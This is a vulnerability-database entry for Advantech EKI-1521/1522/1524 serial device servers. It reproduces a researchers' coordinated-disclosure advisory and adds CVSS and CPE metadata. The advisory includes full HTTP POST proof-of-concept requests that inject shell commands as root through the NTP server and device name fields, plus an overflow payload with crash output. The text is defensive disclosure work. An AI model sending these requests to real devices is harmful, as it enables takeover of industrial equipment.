All the vulnerabilites related to Advantech - EKI-1524
var-202305-0444
Vulnerability from variot
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0
title| Multiple Vulnerabilities
product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series
vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com
Vendor description
"Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence."
Source: https://www.advantech.com/en/about
Vulnerable versions
EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21
Vulnerability overview
1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.
2) Buffer Overflow (CVE-2023-2575) The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.
Proof of Concept
1) Authenticated Command Injection The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background:
1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94.
2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
The serial port of the device provides error messages, which already indicate
that the stack has been corrupted:
/ # *** Error in ./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in./index.cgi': malloc(): memory corruption: 0x00069898 ***
Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...]
The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
Update the product to the latest available firmware version.
Workaround
None
Recommendation
CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.
Contact Timeline
2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory.
Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202305-0444",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1522",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1522",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1524",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2574"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
],
"trust": 0.6
},
"cve": "CVE-2023-2574",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-2574",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-2574",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "office@cyberdanube.com",
"id": "CVE-2023-2574",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202305-378",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0\n-------------------------------------------------------------------------------\n title| Multiple Vulnerabilities\n product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series\n vulnerable version| 1.21\n fixed version| 1.24\n CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575\n impact| High\n homepage| https://advantech.com\n found| 2023-03-06\n by| S. Dietz, T. Weber (Office Vienna)\n | CyberDanube Security Research\n | Vienna | St. P\\xf6lten\n |\n | https://www.cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\"Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\"\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21\nEKI-1522-CE series / 1.21\nEKI-1521-CE series / 1.21\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)\nThe web server of the device is prone to two authenticated command injections. \nThese allow an attacker to gain full access to the underlying operating system\nof the device. This device class can be attached to legacy systems via RS-232,\nRS-422 or RS-485. Such peripheral systems can be affected by attacks to the\ndevice from malicious actors. \n\n2) Buffer Overflow (CVE-2023-2575)\nThe web server is prone to a buffer overflow, triggered due to missing input\nlenght validation in the NTP input field. According to the vendor, the NTP\nserver string is expected to be 64 bytes long, which is not correctly checked. \n\nProof of Concept\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection\nThe web server is prone to two authenticated command injections via POST\nparameters. The following proof-of-concepts show how to inject commands to the\nsystem which gets executed with root permissions in the background:\n\n1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)\nThe following POST request executes the command \\x93;ping 10.0.0.1\\x94 on the system:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=;ping+10.0.0.1;\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nIt is also possible to execute this command without any interceptor proxy by\nenclose it with \";\", which results in the string \\x93;ping 10.0.0.1;\\x94. It is only executed\non reboot, but this can also be done via the device\\x92s web-interface. A POST\nrequest which injects the command \\x93;ls /etc;\\x94 can be looks like the following:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=;ls+/etc;\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nSuch command can also be injected by setting the device name to \\x93;ls /etc;\\x94. \n\n\n2) Buffer Overflow (CVE-2023-2575)\nThe following POST request can be used to trigger a buffer overflow\nvulnerability in the web server:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.97\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 823\nOrigin: http://172.16.0.97\nConnection: close\nReferer: http://172.16.0.97/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=7\u0026min_name=2\u0026sec_name=52\u0026tz=UTC12%3A0\u0026ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n===============================================================================\n\nThe serial port of the device provides error messages, which already indicate\nthat the stack has been corrupted:\n/ # *** Error in `./index.cgi\u0027: free(): invalid next size (normal): 0x00069828 ***\n*** Error in `./index.cgi\u0027: malloc(): memory corruption: 0x00069898 ***\n\nFurthermore, the forked child processes seem to remain in the process list as\nzombies - three buffer overflows were triggered in this case:\n/ # ps\nPID USER COMMAND\n[...]\n 935 root ./index.cgi func=setsys\n 959 root ./index.cgi func=setsys\n 983 root ./index.cgi func=setsys\n[...]\n\n\nThe vulnerabilities were manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpdate the product to the latest available firmware version. \n\n\nWorkaround\n-------------------------------------------------------------------------------\nNone\n\n\nRecommendation\n-------------------------------------------------------------------------------\nCyberDanube recommends Advantech customers to upgrade the firmware to the\nlatest version available. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-03-08: Contacting Advantech via Service Request form; No answer. \n2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);\n Vendor confirmed vulnerabilities and will provide a fixed firmware\n until 2023-05-13. Asked vendor for affected models; Vendo\n responded that EKI-1524/1522/1521 series are affected. \n2023-03-20: Asked for status update. \n2023-03-21: Vendor responded that the firmware is currently under testing. \n2023-03-31: Vendor statet, that firmware is done and sent it via email; Found\n additional issues and responded to vendor. \n2023-04-01: Vendor asked multiple question. \n2023-04-02: Responded to vendor, answered questions and asked for a call;\n Vendor agreed. \n2023-04-04: Set date for a call to 2023-04-10. \n2023-04-10: Clarified further issues. \n2023-04-23: Vendor sent notification that a beta release of the firmware is\n available. \n2023-05-02: Vendor sent notification that a new firmware release is online. \n2023-05-04: Asked vendor if the advisory can be published earlier than agreed. \n2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities\n have been fixed. \n2023-05-11: Coordinated release of security advisory. \n\nWeb: https://www.cyberdanube.com\nTwitter: https://twitter.com/cyberdanube\nMail: research at cyberdanube dot com\n\nEOF S. Dietz, T. Weber / @2023\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"db": "PACKETSTORM",
"id": "172307"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-2574",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "172307",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009948",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2023050038",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202305-378",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-2574",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"id": "VAR-202305-0444",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2023-12-18T11:54:15.773000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Advantech Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=237363"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bed3"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bect"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bebl"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/172307/advantech-eki-15xx-series-command-injection-buffer-overflow.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2023/may/4"
},
{
"trust": 2.4,
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2574"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2023050038"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-2574/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2575"
},
{
"trust": 0.1,
"url": "http://172.16.0.100/cgi-bin/index.cgi"
},
{
"trust": 0.1,
"url": "http://172.16.0.97"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2573"
},
{
"trust": 0.1,
"url": "https://www.advantech.com/en/about"
},
{
"trust": 0.1,
"url": "https://advantech.com"
},
{
"trust": 0.1,
"url": "https://medusa.cyberdanube.com)."
},
{
"trust": 0.1,
"url": "https://twitter.com/cyberdanube"
},
{
"trust": 0.1,
"url": "http://172.16.0.100"
},
{
"trust": 0.1,
"url": "https://www.cyberdanube.com"
},
{
"trust": 0.1,
"url": "http://172.16.0.97/cgi-bin/index.cgi"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
